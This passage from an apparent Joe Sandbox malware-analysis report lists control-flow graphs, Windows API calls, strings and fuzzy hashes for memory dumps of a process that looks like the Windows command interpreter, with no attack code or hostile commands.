                                                                                                  control_flow_graph 992 7ff7823dc620-7ff7823dc66f GetConsoleTitleW 993 7ff7823dc675-7ff7823dc687 call 7ff7823daf14 992->993 994 7ff7823ec5f2 992->994 998 7ff7823dc68e-7ff7823dc69d call 7ff7823dca40 993->998 999 7ff7823dc689 993->999 997 7ff7823ec5fc-7ff7823ec60c GetLastError 994->997 1000 7ff7823ec5e3 call 7ff7823d3278 997->1000 1004 7ff7823ec5e8-7ff7823ec5ed call 7ff7823e855c 998->1004 1005 7ff7823dc6a3-7ff7823dc6ac 998->1005 999->998 1000->1004 1004->994 1007 7ff7823dc954-7ff7823dc95e call 7ff7823e291c 1005->1007 1008 7ff7823dc6b2-7ff7823dc6c5 call 7ff7823db9c0 1005->1008 1013 7ff7823dc964-7ff7823dc96b call 7ff7823d89c0 1007->1013 1014 7ff7823ec5de-7ff7823ec5e0 1007->1014 1015 7ff7823dc9b5-7ff7823dc9b8 call 7ff7823e5c6c 1008->1015 1016 7ff7823dc6cb-7ff7823dc6ce 1008->1016 1021 7ff7823dc970-7ff7823dc972 1013->1021 1014->1000 1020 7ff7823dc9bd-7ff7823dc9c9 call 7ff7823e855c 1015->1020 1016->1004 1019 7ff7823dc6d4-7ff7823dc6e9 1016->1019 1022 7ff7823ec616-7ff7823ec620 call 7ff7823e855c 1019->1022 1023 7ff7823dc6ef-7ff7823dc6fa 1019->1023 1038 7ff7823dc9d0-7ff7823dc9d7 1020->1038 1021->997 1026 7ff7823dc978-7ff7823dc99a towupper 1021->1026 1028 7ff7823ec627 1022->1028 1027 7ff7823dc700-7ff7823dc713 1023->1027 1023->1028 1033 7ff7823dc9a0-7ff7823dc9a9 1026->1033 1029 7ff7823ec631 1027->1029 1030 7ff7823dc719-7ff7823dc72c 1027->1030 1028->1029 1035 7ff7823ec63b 1029->1035 1034 7ff7823dc732-7ff7823dc747 call 7ff7823dd3f0 1030->1034 1030->1035 1033->1033 1036 7ff7823dc9ab-7ff7823dc9af 1033->1036 1045 7ff7823dc8ac-7ff7823dc8af 1034->1045 1046 7ff7823dc74d-7ff7823dc750 1034->1046 1043 7ff7823ec645 1035->1043 1036->1015 1039 7ff7823ec60e-7ff7823ec611 call 7ff7823fec14 1036->1039 1041 7ff7823dc872-7ff7823dc8aa call 7ff7823e855c call 7ff7823e8f80 1038->1041 1042 7ff7823dc9dd-7ff7823ec6da SetConsoleTitleW 1038->1042 1039->1022 1042->1041 1053 7ff7823ec64e-7ff7823ec651 1043->1053 1045->1046 1052 7ff7823dc8b5-7ff7823dc8d3 wcsncmp 1045->1052 1049 7ff7823dc752-7ff7823dc764 call 7ff7823dbd38 1046->1049 1050 7ff7823dc76a-7ff7823dc76d 1046->1050 1049->1004 1049->1050 1056 7ff7823dc773-7ff7823dc77a 1050->1056 1057 7ff7823dc840-7ff7823dc84b call 7ff7823dcb40 1050->1057 1052->1050 1058 7ff7823dc8d9 1052->1058 1059 7ff7823dc80d-7ff7823dc811 1053->1059 1060 7ff7823ec657-7ff7823ec65b 1053->1060 1065 7ff7823dc780-7ff7823dc784 1056->1065 1078 7ff7823dc856-7ff7823dc86c 1057->1078 1079 7ff7823dc84d-7ff7823dc855 call 7ff7823dcad4 1057->1079 1058->1046 1061 7ff7823dc9e2-7ff7823dc9e7 1059->1061 1062 7ff7823dc817-7ff7823dc81b 1059->1062 1060->1059 1061->1062 1069 7ff7823dc9ed-7ff7823dc9f7 call 7ff7823e291c 1061->1069 1067 7ff7823dc821 1062->1067 1068 7ff7823dca1b-7ff7823dca1f 1062->1068 1070 7ff7823dc83d 1065->1070 1071 7ff7823dc78a-7ff7823dc7a4 wcschr 1065->1071 1074 7ff7823dc824-7ff7823dc82d 1067->1074 1068->1067 1073 7ff7823dca25-7ff7823ec6b3 call 7ff7823d3278 1068->1073 1089 7ff7823ec684-7ff7823ec698 call 7ff7823d3278 1069->1089 1090 7ff7823dc9fd-7ff7823dca00 1069->1090 1070->1057 1076 7ff7823dc8de-7ff7823dc8f7 1071->1076 1077 7ff7823dc7aa-7ff7823dc7ad 1071->1077 1073->1004 1074->1074 1081 7ff7823dc82f-7ff7823dc837 1074->1081 1083 7ff7823dc900-7ff7823dc908 1076->1083 1084 7ff7823dc7b0-7ff7823dc7b8 1077->1084 1078->1038 1078->1041 1079->1078 1081->1065 1081->1070 1083->1083 1091 7ff7823dc90a-7ff7823dc915 1083->1091 1084->1084 1092 7ff7823dc7ba-7ff7823dc7c7 1084->1092 1089->1004 1090->1062 1095 7ff7823dca06-7ff7823dca10 call 7ff7823d89c0 1090->1095 1096 7ff7823dc917 1091->1096 1097 7ff7823dc93a-7ff7823dc944 1091->1097 1092->1053 1098 7ff7823dc7cd-7ff7823dc7db 1092->1098 1095->1062 1114 7ff7823dca16-7ff7823ec67f GetLastError call 7ff7823d3278 1095->1114 1099 7ff7823dc920-7ff7823dc928 1096->1099 1102 7ff7823dca2a-7ff7823dca2f call 7ff7823e9158 1097->1102 1103 7ff7823dc94a 1097->1103 1100 7ff7823dc7e0-7ff7823dc7e7 1098->1100 1105 7ff7823dc932-7ff7823dc938 1099->1105 1106 7ff7823dc92a-7ff7823dc92f 1099->1106 1107 7ff7823dc800-7ff7823dc803 1100->1107 1108 7ff7823dc7e9-7ff7823dc7f1 1100->1108 1102->1014 1103->1007 1105->1097 1105->1099 1106->1105 1107->1043 1112 7ff7823dc809 1107->1112 1108->1107 1111 7ff7823dc7f3-7ff7823dc7fe 1108->1111 1111->1100 1111->1107 1112->1059 1114->1004
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleTitlewcschr
                                                                                                  • String ID: /$:
                                                                                                  • API String ID: 2364928044-4222935259
                                                                                                  • Opcode ID: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                                                                                  • Instruction ID: 3b5060f0f0f338e586d6c412f36b98331510e08dcf1ea8091f1c33eb779f6140
                                                                                                  • Opcode Fuzzy Hash: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                                                                                  • Instruction Fuzzy Hash: A8C1E361E2864291EA54BB25D4287BDE2A1FF40B82FF44979DD1E47AD1DFBCE844C320

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1171 7ff7823e8d80-7ff7823e8da2 1172 7ff7823e8da4-7ff7823e8daf 1171->1172 1173 7ff7823e8db1-7ff7823e8db4 1172->1173 1174 7ff7823e8dcc 1172->1174 1176 7ff7823e8db6-7ff7823e8dbd 1173->1176 1177 7ff7823e8dbf-7ff7823e8dca Sleep 1173->1177 1175 7ff7823e8dd1-7ff7823e8dd9 1174->1175 1178 7ff7823e8ddb-7ff7823e8de5 _amsg_exit 1175->1178 1179 7ff7823e8de7-7ff7823e8def 1175->1179 1176->1175 1177->1172 1180 7ff7823e8e4c-7ff7823e8e54 1178->1180 1181 7ff7823e8e46 1179->1181 1182 7ff7823e8df1-7ff7823e8e0a 1179->1182 1183 7ff7823e8e56-7ff7823e8e69 _initterm 1180->1183 1184 7ff7823e8e73-7ff7823e8e75 1180->1184 1181->1180 1185 7ff7823e8e0e-7ff7823e8e11 1182->1185 1183->1184 1186 7ff7823e8e80-7ff7823e8e88 1184->1186 1187 7ff7823e8e77-7ff7823e8e79 1184->1187 1188 7ff7823e8e13-7ff7823e8e15 1185->1188 1189 7ff7823e8e38-7ff7823e8e3a 1185->1189 1190 7ff7823e8eb4-7ff7823e8ec8 call 7ff7823e37d8 1186->1190 1191 7ff7823e8e8a-7ff7823e8e98 call 7ff7823e94f0 1186->1191 1187->1186 1192 7ff7823e8e3c-7ff7823e8e41 1188->1192 1193 7ff7823e8e17-7ff7823e8e1b 1188->1193 1189->1180 1189->1192 1200 7ff7823e8ecd-7ff7823e8eda 1190->1200 1191->1190 1201 7ff7823e8e9a-7ff7823e8eaa 1191->1201 1198 7ff7823e8f28-7ff7823e8f3d 1192->1198 1195 7ff7823e8e2d-7ff7823e8e36 1193->1195 1196 7ff7823e8e1d-7ff7823e8e29 1193->1196 1195->1185 1196->1195 1203 7ff7823e8ee4-7ff7823e8eeb 1200->1203 1204 7ff7823e8edc-7ff7823e8ede exit 1200->1204 1201->1190 1205 7ff7823e8eed-7ff7823e8ef3 _cexit 1203->1205 1206 7ff7823e8ef9 1203->1206 1204->1203 1205->1206 1206->1198
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                                                                  • String ID:
                                                                                                  • API String ID: 4291973834-0
                                                                                                  • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                  • Instruction ID: dc3a7a5768d92eed43a4a366496f30c0b21a541ec11bf80ee71cb4318de85f04
                                                                                                  • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                  • Instruction Fuzzy Hash: C841FA39E08602D2F690BB11E950279A6A0FF88746FE40479D91D47AA1DFFDEC88C770

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1207 7ff7823d89c0-7ff7823d8a3d memset call 7ff7823dca40 1210 7ff7823d8a43-7ff7823d8a71 GetDriveTypeW 1207->1210 1211 7ff7823d8ace-7ff7823d8adf 1207->1211 1212 7ff7823eb411-7ff7823eb422 1210->1212 1213 7ff7823d8a77-7ff7823d8a7a 1210->1213 1214 7ff7823d8ae1-7ff7823d8ae8 ??_V@YAXPEAX@Z 1211->1214 1215 7ff7823d8aed 1211->1215 1218 7ff7823eb424-7ff7823eb42b ??_V@YAXPEAX@Z 1212->1218 1219 7ff7823eb430-7ff7823eb435 1212->1219 1213->1211 1216 7ff7823d8a7c-7ff7823d8a7f 1213->1216 1214->1215 1217 7ff7823d8aef-7ff7823d8b16 call 7ff7823e8f80 1215->1217 1216->1211 1220 7ff7823d8a81-7ff7823d8ac8 GetVolumeInformationW 1216->1220 1218->1219 1219->1217 1220->1211 1222 7ff7823eb3fc-7ff7823eb40b GetLastError 1220->1222 1222->1211 1222->1212
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$DriveErrorInformationLastTypeVolume
                                                                                                  • String ID:
                                                                                                  • API String ID: 850181435-0
                                                                                                  • Opcode ID: 1c8e67db695c6f6d23b7c0e3cb32e635de602e3492999dee0d50d7fe40b8053d
                                                                                                  • Instruction ID: ab6de0db48675df47cc683d9f009f9cfdb5be3c0029cbe4223905549a8417287
                                                                                                  • Opcode Fuzzy Hash: 1c8e67db695c6f6d23b7c0e3cb32e635de602e3492999dee0d50d7fe40b8053d
                                                                                                  • Instruction Fuzzy Hash: F341B136608BC1C9E7709F21D8542E9BBA0FB89B45FA44465DA4D47F48CF78D98AC720

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1224 7ff7823e4a14-7ff7823e4a3e GetEnvironmentStringsW 1225 7ff7823e4a40-7ff7823e4a46 1224->1225 1226 7ff7823e4aae-7ff7823e4ac5 1224->1226 1227 7ff7823e4a48-7ff7823e4a52 1225->1227 1228 7ff7823e4a59-7ff7823e4a8f GetProcessHeap HeapAlloc 1225->1228 1227->1227 1229 7ff7823e4a54-7ff7823e4a57 1227->1229 1230 7ff7823e4a9f-7ff7823e4aa9 FreeEnvironmentStringsW 1228->1230 1231 7ff7823e4a91-7ff7823e4a9a memmove 1228->1231 1229->1227 1229->1228 1230->1226 1231->1230
                                                                                                  APIs
                                                                                                  • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A28
                                                                                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A66
                                                                                                  • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A7D
                                                                                                  • memmove.MSVCRT(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A9A
                                                                                                  • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4AA2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 1623332820-0
                                                                                                  • Opcode ID: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
                                                                                                  • Instruction ID: 3997613204cc3af9422d16ec17921c005e864a1acfdc9a00d026a7f41c8fedd8
                                                                                                  • Opcode Fuzzy Hash: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
                                                                                                  • Instruction Fuzzy Hash: 91118F26A14B4282DA50AB02F414139BFA0FB8DF91BA99078DF4E03B44DE7DE885D760
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 1826527819-0
                                                                                                  • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                  • Instruction ID: a2ff4468f06232dc70d880a1e7dd6d4cb6fe6ade86fd3c9ce0328764aba34dfa
                                                                                                  • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                  • Instruction Fuzzy Hash: E90139719086828AE640BB25E4541B8FEA1FB8E756FA45174D94F07792DEBCA888C730
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF7823E1EA0: wcschr.MSVCRT(?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF782400D54), ref: 00007FF7823E1EB3
                                                                                                  • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7823D92AC), ref: 00007FF7823E30CA
                                                                                                  • SetErrorMode.KERNELBASE ref: 00007FF7823E30DD
                                                                                                  • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E30F6
                                                                                                  • SetErrorMode.KERNELBASE ref: 00007FF7823E3106
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorMode$FullNamePathwcschr
                                                                                                  • String ID:
                                                                                                  • API String ID: 1464828906-0
                                                                                                  • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                  • Instruction ID: 312ad0231d6973ac99dde9145f20c9e4e3b21c6ba7f742d4f0bfbd9db51933b7
                                                                                                  • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                  • Instruction Fuzzy Hash: 5A31C425A0865592E764BF15E41007EF660FB45B92FE48178DA4E43FD0DEFDE849C320
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset
                                                                                                  • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                                  • API String ID: 2221118986-3416068913
                                                                                                  • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                  • Instruction ID: 423b76c4641fe05239adfcc9ab6d587cde1923ab0086d4ed8240f3d0783d2ba6
                                                                                                  • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                  • Instruction Fuzzy Hash: 87112921A1874280EF50EB55E1642B99290BF84BE5FB84779EE6D4BBD5DE7CD480C320
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memsetwcschr
                                                                                                  • String ID: 2$COMSPEC
                                                                                                  • API String ID: 1764819092-1738800741
                                                                                                  • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                  • Instruction ID: 3e4a6c0cf2ccdfd2396138fb7afe1a49a3760ee3bf817341686a5cb0ab7cbccc
                                                                                                  • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                  • Instruction Fuzzy Hash: 685197A1E08342A5FB607B31A468379E396BF44B86FB44079DA4D43ED5DEACE844C760
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                                                                  • String ID:
                                                                                                  • API String ID: 4254246844-0
                                                                                                  • Opcode ID: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                                                                                  • Instruction ID: c39dd80a59581e210bd5026aa9b88c4c8f8fbae6fed3db53ba25dc5fa151d35f
                                                                                                  • Opcode Fuzzy Hash: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                                                                                  • Instruction Fuzzy Hash: A441B325F0874296EE10AB00E4643B9E7A0FF89792FE44479D94E47F90DFBCE849C620
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heap$EnvironmentFreeProcessVariable
                                                                                                  • String ID:
                                                                                                  • API String ID: 2643372051-0
                                                                                                  • Opcode ID: 3eb4ce940398ca8009a7b16f8ee82d547b33230cfdd527662f43d3989e43a2d7
                                                                                                  • Instruction ID: 66b3211645dbcc113554455a9723c0d26cd1546e27b955e3aad18ac803aeb091
                                                                                                  • Opcode Fuzzy Hash: 3eb4ce940398ca8009a7b16f8ee82d547b33230cfdd527662f43d3989e43a2d7
                                                                                                  • Instruction Fuzzy Hash: 44F08672B19B4285EB40AB66F404075FEE1FF5D7A2BA59274D63E03794DEBC9884C220
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
